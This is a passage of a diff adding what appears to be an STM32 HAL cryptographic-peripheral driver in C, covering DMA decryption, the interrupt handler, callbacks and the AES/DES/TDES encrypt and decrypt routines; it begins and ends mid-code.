hcryp->pCrypInBuffPtr = Input; + hcryp->pCrypOutBuffPtr = Output; + + /* Calculate Size parameter in Byte*/ + if (hcryp->Init.DataWidthUnit == CRYP_DATAWIDTHUNIT_WORD) + { + hcryp->Size = Size * 4U; + } + else + { + hcryp->Size = Size; + } + +#if defined (CRYP) + + /* Set decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGODIR, CRYP_OPERATINGMODE_DECRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & CRYP_CR_ALGOMODE; + + switch (algo) + { + case CRYP_DES_ECB: + case CRYP_DES_CBC: + case CRYP_TDES_ECB: + case CRYP_TDES_CBC: + + /*Set Key */ + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 1); + if ((hcryp->Init.Algorithm == CRYP_TDES_ECB) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 5); + } + + /* Set the Initialization Vector*/ + if ((hcryp->Init.Algorithm == CRYP_DES_CBC) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + } + + /* Flush FIFO */ + HAL_CRYP_FIFO_FLUSH(hcryp); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Start DMA process transfer for DES/TDES */ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), ((uint16_t)(hcryp->Size) / 4U), + (uint32_t)(hcryp->pCrypOutBuffPtr)); + break; + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES decryption */ + status = CRYP_AES_Decrypt_DMA(hcryp); + break; + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + case CRYP_AES_GCM: + /* AES GCM decryption */ + status = CRYP_AESGCM_Process_DMA(hcryp) ; + break; + + case CRYP_AES_CCM: + /* AES CCM decryption */ + status = CRYP_AESCCM_Process_DMA(hcryp); + break; + #endif /* GCM CCM defined*/ + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } + +#else /*AES*/ + + /* Set decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_DECRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & AES_CR_CHMOD; + + switch (algo) + { + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES decryption */ + status = CRYP_AES_Decrypt_DMA(hcryp); + break; + + case CRYP_AES_GCM_GMAC: + /* AES GCM decryption */ + status = CRYP_AESGCM_Process_DMA(hcryp) ; + break; + + case CRYP_AES_CCM: + /* AES CCM decryption */ + status = CRYP_AESCCM_Process_DMA(hcryp); + break; + + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } +#endif /* End AES or CRYP */ + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + status = HAL_ERROR; + } + + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** @defgroup CRYP_Exported_Functions_Group3 CRYP IRQ handler management + * @brief CRYP IRQ handler. + * +@verbatim + ============================================================================== + ##### CRYP IRQ handler management ##### + ============================================================================== +[..] This section provides CRYP IRQ handler and callback functions. + (+) HAL_CRYP_IRQHandler CRYP interrupt request + (+) HAL_CRYP_InCpltCallback input data transfer complete callback + (+) HAL_CRYP_OutCpltCallback output data transfer complete callback + (+) HAL_CRYP_ErrorCallback CRYP error callback + (+) HAL_CRYP_GetState return the CRYP state + (+) HAL_CRYP_GetError return the CRYP error code +@endverbatim + * @{ + */ + +/** + * @brief This function handles cryptographic interrupt request. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval None + */ +void HAL_CRYP_IRQHandler(CRYP_HandleTypeDef *hcryp) +{ + +#if defined (CRYP) + + uint32_t itstatus = hcryp->Instance->MISR; + + if ((itstatus & (CRYP_IT_INI | CRYP_IT_OUTI)) != 0U) + { + if ((hcryp->Init.Algorithm == CRYP_DES_ECB) || (hcryp->Init.Algorithm == CRYP_DES_CBC) + || (hcryp->Init.Algorithm == CRYP_TDES_ECB) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + CRYP_TDES_IT(hcryp); /* DES or TDES*/ + } + else if ((hcryp->Init.Algorithm == CRYP_AES_ECB) || (hcryp->Init.Algorithm == CRYP_AES_CBC) + || (hcryp->Init.Algorithm == CRYP_AES_CTR)) + { + CRYP_AES_IT(hcryp); /*AES*/ + } + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + else if ((hcryp->Init.Algorithm == CRYP_AES_GCM) || (hcryp->Init.Algorithm == CRYP_CR_ALGOMODE_AES_CCM)) + { + /* if header phase */ + if ((hcryp->Instance->CR & CRYP_PHASE_HEADER) == CRYP_PHASE_HEADER) + { + CRYP_GCMCCM_SetHeaderPhase_IT(hcryp); + } + else /* if payload phase */ + { + CRYP_GCMCCM_SetPayloadPhase_IT(hcryp); + } + } + #endif /* GCM CCM defined*/ + else + { + /* Nothing to do */ + } + } + +#else /*AES*/ + if (__HAL_CRYP_GET_FLAG(hcryp, CRYP_IT_CCF) != RESET) + { + if (__HAL_CRYP_GET_IT_SOURCE(hcryp, CRYP_IT_CCFIE) != RESET) + { + + /* Clear computation complete flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + if (hcryp->Init.Algorithm == CRYP_AES_GCM_GMAC) + { + + /* if header phase */ + if ((hcryp->Instance->CR & CRYP_PHASE_HEADER) == CRYP_PHASE_HEADER) + { + CRYP_GCMCCM_SetHeaderPhase_IT(hcryp); + } + else /* if payload phase */ + { + CRYP_GCMCCM_SetPayloadPhase_IT(hcryp); + } + } + else if (hcryp->Init.Algorithm == CRYP_AES_CCM) + { + /* if header phase */ + if (hcryp->Init.HeaderSize >= hcryp->CrypHeaderCount) + { + CRYP_GCMCCM_SetHeaderPhase_IT(hcryp); + } + else /* if payload phase */ + { + CRYP_GCMCCM_SetPayloadPhase_IT(hcryp); + } + } + else /* AES Algorithm ECB,CBC or CTR*/ + { + CRYP_AES_IT(hcryp); + } + } + } + /* Check if error occurred */ + if (__HAL_CRYP_GET_IT_SOURCE(hcryp, CRYP_IT_ERRIE) != RESET) + { + /* If write Error occurred */ + if (__HAL_CRYP_GET_FLAG(hcryp, CRYP_IT_WRERR) != RESET) + { + hcryp->ErrorCode |= HAL_CRYP_ERROR_WRITE; + } + /* If read Error occurred */ + if (__HAL_CRYP_GET_FLAG(hcryp, CRYP_IT_RDERR) != RESET) + { + hcryp->ErrorCode |= HAL_CRYP_ERROR_READ; + } + } +#endif /* End AES or CRYP */ +} + +/** + * @brief Return the CRYP error code. + * @param hcryp : pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for the CRYP IP + * @retval CRYP error code + */ +uint32_t HAL_CRYP_GetError(CRYP_HandleTypeDef *hcryp) +{ + return hcryp->ErrorCode; +} + +/** + * @brief Returns the CRYP state. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @retval HAL state + */ +HAL_CRYP_STATETypeDef HAL_CRYP_GetState(CRYP_HandleTypeDef *hcryp) +{ + return hcryp->State; +} + +/** + * @brief Input FIFO transfer completed callback. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @retval None + */ +__weak void HAL_CRYP_InCpltCallback(CRYP_HandleTypeDef *hcryp) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcryp); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CRYP_InCpltCallback can be implemented in the user file + */ +} + +/** + * @brief Output FIFO transfer completed callback. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @retval None + */ +__weak void HAL_CRYP_OutCpltCallback(CRYP_HandleTypeDef *hcryp) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcryp); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CRYP_OutCpltCallback can be implemented in the user file + */ +} + +/** + * @brief CRYP error callback. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @retval None + */ +__weak void HAL_CRYP_ErrorCallback(CRYP_HandleTypeDef *hcryp) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcryp); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CRYP_ErrorCallback could be implemented in the user file + */ +} +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup CRYP_Private_Functions + * @{ + */ + +#if defined (CRYP) + +/** + * @brief Encryption in ECB/CBC Algorithm with DES/TDES standard. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Timeout: specify Timeout value + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_TDES_Process(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t temp[2]; /* Temporary CrypOutBuff */ + uint16_t incount; /* Temporary CrypInCount Value */ + uint16_t outcount; /* Temporary CrypOutCount Value */ + uint32_t i; + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + /*Start processing*/ + while ((hcryp->CrypInCount < (hcryp->Size / 4U)) && (outcount < (hcryp->Size / 4U))) + { + /* Temporary CrypInCount Value */ + incount = hcryp->CrypInCount; + /* Write plain data and get cipher data */ + if (((hcryp->Instance->SR & CRYP_FLAG_IFNF) != 0x0U) && (incount < (hcryp->Size / 4U))) + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + + /* Wait for OFNE flag to be raised */ + if (CRYP_WaitOnOFNEFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state & errorCode*/ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + if (((hcryp->Instance->SR & CRYP_FLAG_OFNE) != 0x0U) && (outcount < (hcryp->Size / 4U))) + { + /* Read the output block from the Output FIFO and put them in temporary Buffer then get CrypOutBuff from temporary buffer */ + for (i = 0U; i < 2U; i++) + { + temp[i] = hcryp->Instance->DOUT; + } + i = 0U; + while (((hcryp->CrypOutCount < ((hcryp->Size) / 4U))) && (i < 2U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + } + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + } + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief CRYP block input/output data handling under interruption with DES/TDES standard. + * @note The function is called under interruption only, once + * interruptions have been enabled by CRYP_Decrypt_IT() and CRYP_Encrypt_IT(). + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @retval none + */ +static void CRYP_TDES_IT(CRYP_HandleTypeDef *hcryp) +{ + uint32_t temp[2]; /* Temporary CrypOutBuff */ + uint32_t i; + + if (hcryp->State == HAL_CRYP_STATE_BUSY) + { + if (__HAL_CRYP_GET_IT(hcryp, CRYP_IT_INI) != 0x0U) + { + if (__HAL_CRYP_GET_FLAG(hcryp, CRYP_FLAG_INRIS) != 0x0U) + { + /* Write input block in the IN FIFO */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + + if (hcryp->CrypInCount == ((uint16_t)(hcryp->Size) / 4U)) + { + /* Disable interruption */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_INI); + /* Call the input data transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1U) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + } + if (__HAL_CRYP_GET_IT(hcryp, CRYP_IT_OUTI) != 0x0U) + { + if (__HAL_CRYP_GET_FLAG(hcryp, CRYP_FLAG_OUTRIS) != 0x0U) + { + /* Read the output block from the Output FIFO and put them in temporary Buffer then get CrypOutBuff from temporary buffer */ + for (i = 0U; i < 2U; i++) + { + temp[i] = hcryp->Instance->DOUT; + } + i = 0U; + while (((hcryp->CrypOutCount < ((hcryp->Size) / 4U))) && (i < 2U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + if (hcryp->CrypOutCount == ((uint16_t)(hcryp->Size) / 4U)) + { + /* Disable interruption */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_OUTI); + + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Call output transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Output complete callback*/ + hcryp->OutCpltCallback(hcryp); +#else + /*Call legacy weak Output complete callback*/ + HAL_CRYP_OutCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + } + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } +} + +#endif /* CRYP */ + +/** + * @brief Encryption in ECB/CBC & CTR Algorithm with AES Standard + * @param hcryp: pointer to a CRYP_HandleTypeDef structure + * @param Timeout: specify Timeout value + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AES_Encrypt(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint16_t outcount; /* Temporary CrypOutCount Value */ + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + } + } + + if (DoKeyIVConfig == 1U) + { + + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + if (hcryp->Init.Algorithm != CRYP_AES_ECB) + { + /* Set the Initialization Vector*/ +#if defined (AES) + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#else /* CRYP */ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#endif /* End AES or CRYP */ + } + } /* if (DoKeyIVConfig == 1U) */ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + while ((hcryp->CrypInCount < (hcryp->Size / 4U)) && (outcount < (hcryp->Size / 4U))) + { + /* Write plain Ddta and get cipher data */ + CRYP_AES_ProcessData(hcryp, Timeout); + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + } + + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Encryption in ECB/CBC & CTR mode with AES Standard using interrupt mode + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AES_Encrypt_IT(CRYP_HandleTypeDef *hcryp) +{ + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + } + } + + if (DoKeyIVConfig == 1U) + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + if (hcryp->Init.Algorithm != CRYP_AES_ECB) + { + /* Set the Initialization Vector*/ +#if defined (AES) + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); + +#else /* CRYP */ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#endif /* End AES or CRYP */ + } + } /* if (DoKeyIVConfig == 1U) */ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + if (hcryp->Size != 0U) + { +#if defined (AES) + + /* Enable computation complete flag and error interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Write the input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + +#else /* CRYP */ + + /* Enable interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_INI | CRYP_IT_OUTI); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + +#endif /* End AES or CRYP */ + } + else + { + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Decryption in ECB/CBC & CTR mode with AES Standard + * @param hcryp: pointer to a CRYP_HandleTypeDef structure + * @param Timeout: Specify Timeout value + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AES_Decrypt(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint16_t outcount; /* Temporary CrypOutCount Value */ + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + } + } + + if (DoKeyIVConfig == 1U) + { + /* Key preparation for ECB/CBC */ + if (hcryp->Init.Algorithm != CRYP_AES_CTR) + { +#if defined (AES) + if (hcryp->AutoKeyDerivation == DISABLE)/*Mode 2 Key preparation*/ + { + /* Set key preparation for decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_KEYDERIVATION); + + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Wait for CCF flag to be raised */ + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state & error code*/ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Return to decryption operating mode(Mode 3)*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_DECRYPT); + } + else /*Mode 4 : decryption & Key preparation*/ + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set decryption & Key preparation operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_KEYDERIVATION_DECRYPT); + } +#else /* CRYP */ + /* change ALGOMODE to key preparation for decryption*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, CRYP_CR_ALGOMODE_AES_KEY); + + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Wait for BUSY flag to be raised */ + if (CRYP_WaitOnBUSYFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Turn back to ALGOMODE of the configuration */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, hcryp->Init.Algorithm); + +#endif /* End AES or CRYP */ + } + else /*Algorithm CTR */ + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + } + + /* Set IV */ + if (hcryp->Init.Algorithm != CRYP_AES_ECB) + { + /* Set the Initialization Vector*/ +#if defined (AES) + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#else /* CRYP */ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#endif /* End AES or CRYP */ + } + } /* if (DoKeyIVConfig == 1U) */ + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + while ((hcryp->CrypInCount < (hcryp->Size / 4U)) && (outcount < (hcryp->Size / 4U))) + { + /* Write plain data and get cipher data */ + CRYP_AES_ProcessData(hcryp, Timeout); + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + } + + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Return function status */ + return HAL_OK; +} +/** + * @brief Decryption in ECB/CBC & CTR mode with AES Standard using interrupt mode + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AES_Decrypt_IT(CRYP_HandleTypeDef *hcryp) +{ + __IO uint32_t count = 0U; + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + } + } + + if (DoKeyIVConfig == 1U) + { + /* Key preparation for ECB/CBC */ + if (hcryp->Init.Algorithm != CRYP_AES_CTR) + { +#if defined (AES) + if (hcryp->AutoKeyDerivation == DISABLE)/*Mode 2 Key preparation*/ + { + /* Set key preparation for decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_KEYDERIVATION); + + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Wait for CCF flag to be raised */ + count = CRYP_TIMEOUT_KEYPREPARATION; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Return to decryption operating mode(Mode 3)*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_DECRYPT); + } + else /*Mode 4 : decryption & key preparation*/ + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set decryption & key preparation operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_KEYDERIVATION_DECRYPT); + } +#else /* CRYP */ + + /* change ALGOMODE to key preparation for decryption*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, CRYP_CR_ALGOMODE_AES_KEY); + + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Wait for BUSY flag to be raised */ + count = CRYP_TIMEOUT_KEYPREPARATION; + do + { + count-- ; + if (count == 0U) + { + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_SET(hcryp->Instance->SR, CRYP_FLAG_BUSY)); + + /* Turn back to ALGOMODE of the configuration */ + MODIFY_REG(hcryp->Instance->CR, 